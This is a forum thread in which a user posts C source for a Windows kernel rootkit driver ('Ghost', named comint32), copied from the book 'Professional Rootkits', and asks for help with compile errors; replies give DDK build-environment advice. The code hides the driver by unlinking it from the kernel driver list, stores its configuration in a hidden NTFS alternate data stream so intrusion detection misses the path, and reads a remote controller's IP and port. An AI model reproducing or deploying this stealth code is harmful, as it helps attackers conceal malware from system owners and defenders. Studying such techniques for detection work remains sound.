12 replies to this topic

[kty1104]

rootkit example problem
hi i read the book that name is professional rootkits
and im trying to make some program(just hiding) as following in the book(professional rootkits)
i write the source codes(which is in chapter2) down in visual studio 2008
even though i install the windows 2003 ddk(as shown in the book)
and setting up some directories such as
tool-option-projects and solution-VC++Directories-Include files
C:\WINDDK\3790.1830\inc\wxp
tool-option-projects and solution-VC++Directories-Library files
C:\WINDDK\3790.1830\lib\wxp
i encounterd some several problems
the error code dump is here(i try make the project in both of console app and win32 app)
====================
Compiling...
ConfigManager.c
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13258) : error C2061: syntax error : identifier 'PCONTEXT'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13259) : error C2059: syntax error : '}'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13332) : fatal error C1189: #error : "No target architecture defined"
fileManager.c
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13258) : error C2061: syntax error : identifier 'PCONTEXT'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13259) : error C2059: syntax error : '}'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13332) : fatal error C1189: #error : "No target architecture defined"
ghost.c
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13258) : error C2061: syntax error : identifier 'PCONTEXT'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13259) : error C2059: syntax error : '}'
c:\program files\microsoft visual studio 9.0\vc\include\ntddk.h(13332) : fatal error C1189: #error : "No target architecture defined"
Generating Code...
====================

if you gimme a your e mail i will give you the book which is im encounterd several problems.
if any suggestion or tackle kty1104code [at] gmail.com welcome.

====================

the source code is here

ghost.h==============

#ifndef _GHOST_H_
#define _GHOST_H_
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD* PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef struct _DRIVER_DATA
{
 LIST_ENTRY listEntry;
 DWORD  unknown1;
 DWORD  unknown2;
 DWORD  unknown3;
 DWORD  unknown4;
 DWORD  unknown5;
 DWORD  unknown6;
 DWORD  unknown7;
 UNICODE_STRING path;
 UNICODE_STRING name;
} DRIVER_DATA;
#endif

ghost.c============

#include "ntddk.h"
#include "Ghost.h"
#include "fileManager.h"
#include "configManager.h"
// Global version data
ULONG majorVersion;
ULONG minorVersion;
// Comment out in free build to avoid detection
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
 DbgPrint("comint32: OnUnload called.");
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
 DRIVER_DATA* driverData;
 // Get the operating system version
 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
 // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
 // Major = 5: Windows Server 2003, Windows XP or Windows 2000
 // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
 // Minor = 1: Windows XP
 // Minor = 2: Windows Server 2003
 if ( majorVersion == 5 && minorVersion == 2 )
 {
  DbgPrint("comint32: Running on Windows 2003");
 }
 else if ( majorVersion == 5 && minorVersion == 1 )
 {
  DbgPrint("comint32: Running on Windows XP");
 }
 else if ( majorVersion == 5 && minorVersion == 0 )
 {
  DbgPrint("comint32: Running on Windows 2000");
 }
 else if ( majorVersion == 4 && minorVersion == 0 )
 {
  DbgPrint("comint32: Running on Windows NT 4.0");
 }
 else
 {
  DbgPrint("comint32: Running on unknown system");
 }
 // Hide this driver
 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
 if( driverData != NULL )
 {
  // unlink this driver entry from the driver list
  *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
  driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
 }
// Allow the driver to be unloaded
 pDriverObject->DriverUnload = OnUnload;
 // Configure the controller connection
 if( !NT_SUCCESS( Configure() ) )
 {
  DbgPrint("comint32: Could not configure remote connection.\n");
  return STATUS_UNSUCCESSFUL;
 }
 return STATUS_SUCCESS;
}

==================
configmanager.h======

#ifndef _CONFIG_MANAGER_H_
#define _CONFIG_MANAGER_H_

Char  masterPort[10];
Char  masterAddress1[4];
Char  masterAddress2[4];
Char  masterAddress3[4];
Char  masterAddress4[4];

NTSTATUS Configure();

#endif

==================
configmanager.c======

// First try c:\config32
// If it's there, save as MASTER_FILE:config32 and delete c:\config32
// If it's not there, try MASTER_FILE:configFile
// If that doesn't exist, quit!

#include "ntddk.h"
#include "fileManager.h"
#include "configManager.h"

// Set the controllers IP and port
NTSTATUS Configure()
{
 CHAR data[21];
 SHORT vis = 0;
 SHORT loop;
 SHORT dataIndex;
 SHORT addressIndex;
 ULONG fileSize;
 PHANDLE fileHandle;

 // Need to know who to connect to
 if( NT_SUCCESS( GetFile( L"\\??\\C:\\config32", data, 21, &fileSize ) ) )
 {
  DbgPrint("comint32: Reading config from visible file.");
  vis = 1;
 }
 else
 {
  if( NT_SUCCESS( GetFile( L"config32", data, 21, &fileSize ) ) )
  {
   DbgPrint("comint32: Reading config from hidden file.");
  }
  else
  {
   DbgPrint("comint32: Error. Could not find a config file.");
   return STATUS_UNSUCCESSFUL;
  }
 }
 // Parse master address and port into aaa.bbb.ccc.ddd:eeeee
 dataIndex = 0;
 addressIndex = 0;
 // First 3 are xxx of xxx.111.111.111:11111
 for( loop = 0; loop < 3; loop++ )
  masterAddress1[addressIndex++] = data[dataIndex++];
 masterAddress1[addressIndex] = 0;
 addressIndex = 0; // reset
 dataIndex++; // skip the dot
 // Next 3 are xxx of 111.xxx.111.111:11111
 for( loop = 0; loop < 3; loop++ )
  masterAddress2[addressIndex++] = data[dataIndex++];
 masterAddress2[addressIndex] = 0;
 addressIndex = 0; // reset
 dataIndex++; // skip the dot
 // Next 3 are xxx of 111.111.xxx.111:11111
 for( loop = 0; loop < 3; loop++ )
  masterAddress3[addressIndex++] = data[dataIndex++];
 masterAddress3[addressIndex] = 0;
 addressIndex = 0; // reset
 dataIndex++; // skip the dot
 // Next 3 are xxx of 111.111.111.xxx:11111
 for( loop = 0; loop < 3; loop++ )
  masterAddress4[addressIndex++] = data[dataIndex++];
 masterAddress4[addressIndex] = 0;
 addressIndex = 0; // reset
 dataIndex++; // skip the semicolon
 // Next 5 are xxxxx of 111.111.111.111:xxxxx (port)
 for( loop = 0; loop < 5; loop++ )
  masterPort[addressIndex++] = data[dataIndex++];
 masterPort[addressIndex] = 0;
 DbgPrint( "comint32: Using %s.%s.%s.%s:%s",
   masterAddress1,
   masterAddress2,
   masterAddress3,
   masterAddress4,
   masterPort);
 if( vis == 1 )
 {
  DbgPrint("comint32: Saving config to hidden file.");
  PutFile( L"config32", data, fileSize );
  DbgPrint("comint32: You may delete the visible file.");
 }
 return STATUS_SUCCESS;
}

==================
filemanager.h========

#ifndef _FILE_MANAGER_H_
#define _FILE_MANAGER_H_
// Though no documentation mentions it, NTFS-ADS works with directories too!
// Each implementation should use a different known directory
// to avoid having the full pathname added to IDS's.
#define MASTER_FILE L"\\??\\C:\\WINDOWS\\Resources"
NTSTATUS GetFile( WCHAR* filename, CHAR* buffer, ULONG buffersize, PULONG
fileSizePtr );
NTSTATUS PutFile( WCHAR* filename, CHAR* buffer, ULONG buffersize );
#endif

==================
filemanager.c========

// Use without path to get/put Alternate Data Streams from/to MASTER_FILE
// Use with full path to get/put regular files from/to the visible file system

#include "ntddk.h"
#include <stdio.h>
#include "fileManager.h"
#include "Ghost.h"

NTSTATUS GetFile( WCHAR* filename, CHAR* buffer, ULONG buffersize, PULONG
fileSizePtr )
{
 NTSTATUS rc;
 WCHAR ADSName[256];
 HANDLE hStream;
 OBJECT_ATTRIBUTES ObjectAttr;
 UNICODE_STRING FileName;
 IO_STATUS_BLOCK ioStatusBlock;
 CHAR string[256];

 // set file size
 *fileSizePtr = 0;
 // Get from NTFS-ADS if not full path
 if( wcschr( filename, '\\' ) == NULL )
  _snwprintf( ADSName, 255, L"%s:%s", MASTER_FILE, filename );
 else
  wcscpy( ADSName, filename );

 RtlInitUnicodeString( &FileName, ADSName );
 InitializeObjectAttributes( &ObjectAttr,
  &FileName,
  OBJ_CASE_INSENSITIVE,
  NULL,
  NULL);

 rc = ZwOpenFile(
  &hStream,
  SYNCHRONIZE | GENERIC_ALL,
  &ObjectAttr,
  &ioStatusBlock,
  FILE_SHARE_READ | FILE_SHARE_WRITE,
 FILE_SYNCHRONOUS_IO_NONALERT );

 if ( rc != STATUS_SUCCESS )
 {
  DbgPrint( "comint32: GetFile() ZwOpenFile() failed.\n" );
  _snprintf( string, 255, "comint32: rc = %0x, status = %0x\n",
   rc,
   ioStatusBlock.Status );
  DbgPrint( string );
  return( STATUS_UNSUCCESSFUL );
 }

 rc = ZwReadFile(
  hStream,
  NULL,
  NULL,
  NULL,
  &ioStatusBlock,
  buffer,
  buffersize,
  NULL,
  NULL );

 if ( rc != STATUS_SUCCESS )
 {
  DbgPrint( "comint32: GetFile() ZwReadFile() failed.\n" );
  _snprintf( string, 255, "comint32: rc = %0x, status = %0x\n",
   rc,
   ioStatusBlock.Status );
  DbgPrint( string );
  return( STATUS_UNSUCCESSFUL );
 }

 // Read was successful, return the number of bytes read
 *fileSizePtr = ioStatusBlock.Information;
 ZwClose( hStream );
 return( STATUS_SUCCESS );
}


NTSTATUS PutFile( WCHAR* filename, CHAR* buffer, ULONG buffersize )
{
 NTSTATUS rc;
 WCHAR ADSName[256];
 HANDLE hStream;
 OBJECT_ATTRIBUTES ObjectAttr;
 UNICODE_STRING FileName;
 IO_STATUS_BLOCK ioStatusBlock;
 CHAR string[256];

 // Put to NTFS-ADS if not full path
 if( wcschr( filename, '\\' ) == NULL )
  _snwprintf( ADSName, 255, L"%s:%s", MASTER_FILE, filename );
 else
  wcscpy( ADSName, filename );

 RtlInitUnicodeString( &FileName, ADSName );
 InitializeObjectAttributes( &ObjectAttr,
  &FileName,
  OBJ_CASE_INSENSITIVE,
  NULL,
  NULL);

 rc = ZwCreateFile(
  &hStream,
  SYNCHRONIZE | GENERIC_ALL,
  &ObjectAttr,
  &ioStatusBlock,
  NULL,
  FILE_ATTRIBUTE_NORMAL,
  FILE_SHARE_READ | FILE_SHARE_WRITE,
  FILE_OVERWRITE_IF,
  FILE_SYNCHRONOUS_IO_NONALERT,
  NULL,
  0);

 if ( rc != STATUS_SUCCESS )
 {
  DbgPrint( "comint32: PutFile() ZwCreateFile() failed.\n" );
  _snprintf( string, 255, "comint32: rc = %0x, status = %0x\n", rc,
ioStatusBlock.Status );
  DbgPrint( string );
  return( STATUS_UNSUCCESSFUL );
 }

 rc = ZwWriteFile(
  hStream,
  NULL,
  NULL,
  NULL,
  &ioStatusBlock,
  buffer,
  buffersize,
  NULL,
  NULL );

 if ( rc != STATUS_SUCCESS )
 {
  DbgPrint( "comint32: PutFile() ZwWriteFile() failed.\n" );
  _snprintf( string, 255, "comint32: rc = %0x, status = %0x\n", rc,
ioStatusBlock.Status );
  DbgPrint( string );
  ZwClose( hStream );
  return( STATUS_UNSUCCESSFUL );
 }

 ZwClose( hStream );
 return( STATUS_SUCCESS );
}

==================

the book said
Here is the content of the SOURCES file:
TARGETNAME=comint32
TARGETPATH=OBJ
TARGETTYPE=DRIVER
SOURCES=Ghost.c\
fileManager.c\
configManager.c
And here is the content of the MAKEFILE file:

#
# DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
# file to this component.  This file merely indirects to the real make file
# that is shared by all the driver components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def

but i dont know what it means i dont know how to set the such a SOURCE file and MAKEFILE could you let me know about this too?

Edited by WingedPanther, 25 July 2009 - 11:19 AM.
add code tags (the # button)

[WingedPanther]

All of your errors are in nttdk.h, which you haven't included here. Since it appears to be part of Visual C, my guess is you may have a bad install.

[kty1104]

WingedPanther said:

All of your errors are in nttdk.h, which you haven't included here. Since it appears to be part of Visual C, my guess is you may have a bad install.

hi im uninstall the vs2008 and delete the visual studio 9.0 folder and
re install the VS2008

but still has error that
fatal error C1083: Cannot open include file: 'ntddk.h': No such file or directory
(actually i copy and paste the ntddk.h to Visual studio 9.0/VC/include folder but today im delete and re installed vs2008)
i thought i set the wrong directory in
tools-options-projects and solutions-VC++directories

is it right that set the ddk folders like
include files-C:\WINDDK\3790.1830\inc\wxp
library files-C:\WINDDK\3790.1830\lib\wxp
?

and i still dont know what the SOURCE/MAKEFILE means and how to setting up

should i reinstall the windows 2003 ddk too?

[kty1104]

oh i try to set the folders like
==============================
tools-options-projects and solutions-VC++ Directories-include files - C:\WINDDK\3790.1830\inc\ddk\wxp
tools-options-projects and solutions-VC++ Directories-library files - C:\WINDDK\3790.1830\lib\wxp\i386
==============================
and the ntddk error is gone away but still 3 errors and 3 warnings
==============================
Compiling...
ConfigManager.c
c:\program files\microsoft sdks\windows\v6.0a\include\basetsd.h(36) : warning C4005: 'POINTER_64' : macro redefinition
c:\winddk\3790.1830\inc\ddk\wxp\ntdef.h(137) : see previous definition of 'POINTER_64'
c:\winddk\3790.1830\inc\ddk\wxp\ntddk.h(33) : fatal error C1083: Cannot open include file: 'bugcodes.h': No such file or directory
fileManager.c
c:\program files\microsoft sdks\windows\v6.0a\include\basetsd.h(36) : warning C4005: 'POINTER_64' : macro redefinition
c:\winddk\3790.1830\inc\ddk\wxp\ntdef.h(137) : see previous definition of 'POINTER_64'
c:\winddk\3790.1830\inc\ddk\wxp\ntddk.h(33) : fatal error C1083: Cannot open include file: 'bugcodes.h': No such file or directory
ghost.c
c:\program files\microsoft sdks\windows\v6.0a\include\basetsd.h(36) : warning C4005: 'POINTER_64' : macro redefinition
c:\winddk\3790.1830\inc\ddk\wxp\ntdef.h(137) : see previous definition of 'POINTER_64'
c:\winddk\3790.1830\inc\ddk\wxp\ntddk.h(33) : fatal error C1083: Cannot open include file: 'bugcodes.h': No such file or directory
Generating Code...
rootkit02 - 3 error(s), 3 warning(s)
===========================
what am i suppose to do?

[WingedPanther]

1) find bugcodes.h.

I don't use Visual Studio, so I'm just kind of stumbling through the error messages right now.

[JMC31337]

this is a 1 yr old post.. but
ya need the DDK
tell yu for a fact the lil bit of OS system detection with PsGetVersion()
worked fine....

[mnirahd]

Hi,

I believe that you need to install Windows Driver Kit. Simple installation of Visual Studio will not help.
Plus I see that you're getting No architecture found error which makes me think that you need to define a target architecture like x86 or x64

Munir

[narasimhaks]

Hi Munir,

U talked about specifying the hardware architecture. I am trying to compile the winddk smartcard example provided in the winddk. But i am getting the No target architecture defined. Can you tell me as to how to define the target architecture? I am new to this field.

Thanks in advance
Nara

[JMC31337]

Some of those examples will work only for win2000 so check to make sure... also try certain build environments in your make file
i.e: _NT_TARGET_VERSION < 0x500 .. if that doesn't work post the entire output of your command line errors

[JMC31337]

edit: its the source file not makefile and dont forget to download the ddk

[mnirahd]

Hi,

After you have installed Windows Driver Kit: then do following

1. Start -> Windows Driver Kit -> Build Environments
2. Select Windows 7/Vista/XP according to your choice: When you open an folder it would show different enviroments (x64 build env, x86 build env). select one your want.

3. This would open a command prompt: cd to appropriate directory that contains the source code and makefile

4. Type bld

5. if everything is in order, then it should be Done!


I hope this helps!

Munir

[JMC31337]

do not use vc++ go into console setup the setenv use the d d k build tool and compile the examples with the build environment program that comes with ddk sorry mods for all my posts, posting this with my cell